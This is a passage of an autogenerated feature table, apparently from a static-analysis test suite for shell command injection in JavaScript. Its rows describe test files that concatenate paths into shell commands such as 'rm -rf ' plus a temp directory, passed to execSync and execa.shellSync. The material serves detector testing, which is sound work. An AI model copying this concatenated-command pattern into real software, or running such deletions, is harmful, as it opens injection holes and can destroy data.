autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe = ... + "\\"" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe = ... + "\\"" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe = ... + "\\"" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe = ... + "\\"" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:56 | safe = ... + "\\"" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:18 | "\\"" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:18 | "\\"" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:18 | "\\"" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:18 | "\\"" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:18 | "\\"" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:18 | "\\"" | stringConcatenatedWith | -endpoint- path.join() + '"' | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:49 | "\\"" + ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:49 | "\\"" + ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:49 | "\\"" + ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:49 | "\\"" + ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:49 | "\\"" + ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:56 | "\\"" + ... + "\\"" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:56 | "\\"" + ... + "\\"" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:56 | "\\"" + ... + "\\"" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:56 | "\\"" + ... + "\\"" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:15:11:56 | "\\"" + ... + "\\"" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:25 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:25 | path | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:25 | path | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:25 | path | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:25 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:30 | path.join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:30 | path.join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:30 | path.join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:30 | path.join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:30 | path.join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | exceptional return of path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | exceptional return of path.jo ... "temp") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | exceptional return of path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | exceptional return of path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | exceptional return of path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") | stringConcatenatedWith | '"' -endpoint- '"' | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:27:11:30 | join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:27:11:30 | join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:27:11:30 | join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:27:11:30 | join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:27:11:30 | join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:32:11:40 | __dirname | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:43:11:48 | "temp" | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:53:11:56 | "\\"" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:53:11:56 | "\\"" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:53:11:56 | "\\"" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:53:11:56 | "\\"" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:53:11:56 | "\\"" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:53:11:56 | "\\"" | stringConcatenatedWith | '"' + path.join() -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:6 | execa | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:6 | execa | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:6 | execa | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:6 | execa | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:6 | execa | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:16 | execa.shellSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:16 | execa.shellSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:16 | execa.shellSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:16 | execa.shellSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:16 | execa.shellSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | exceptional return of execa.s ... + safe) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | exceptional return of execa.s ... + safe) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | exceptional return of execa.s ... + safe) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | exceptional return of execa.s ... + safe) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | exceptional return of execa.s ... + safe) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | execa.s ... + safe) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | execa.s ... + safe) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | execa.s ... + safe) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | execa.s ... + safe) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | execa.s ... + safe) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:8:12:16 | shellSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:8:12:16 | shellSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:8:12:16 | shellSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:8:12:16 | shellSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:8:12:16 | shellSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:26 | 'rm -rf ' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:26 | 'rm -rf ' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:26 | 'rm -rf ' | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:26 | 'rm -rf ' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:26 | 'rm -rf ' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:26 | 'rm -rf ' | stringConcatenatedWith | -endpoint- safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | CalleeFlexibleAccessPath | execa.shellSync | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:18:12:33 | 'rm -rf ' + safe | receiverName | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:30:12:33 | safe | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:30:12:33 | safe | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:30:12:33 | safe | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:30:12:33 | safe | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:30:12:33 | safe | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:30:12:33 | safe | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:0 | this | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | cp | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | module | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | require | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:8 | cp | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:8 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:35 | cp | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:35 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:35 | cp = re ... ocess") | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:35 | cp = 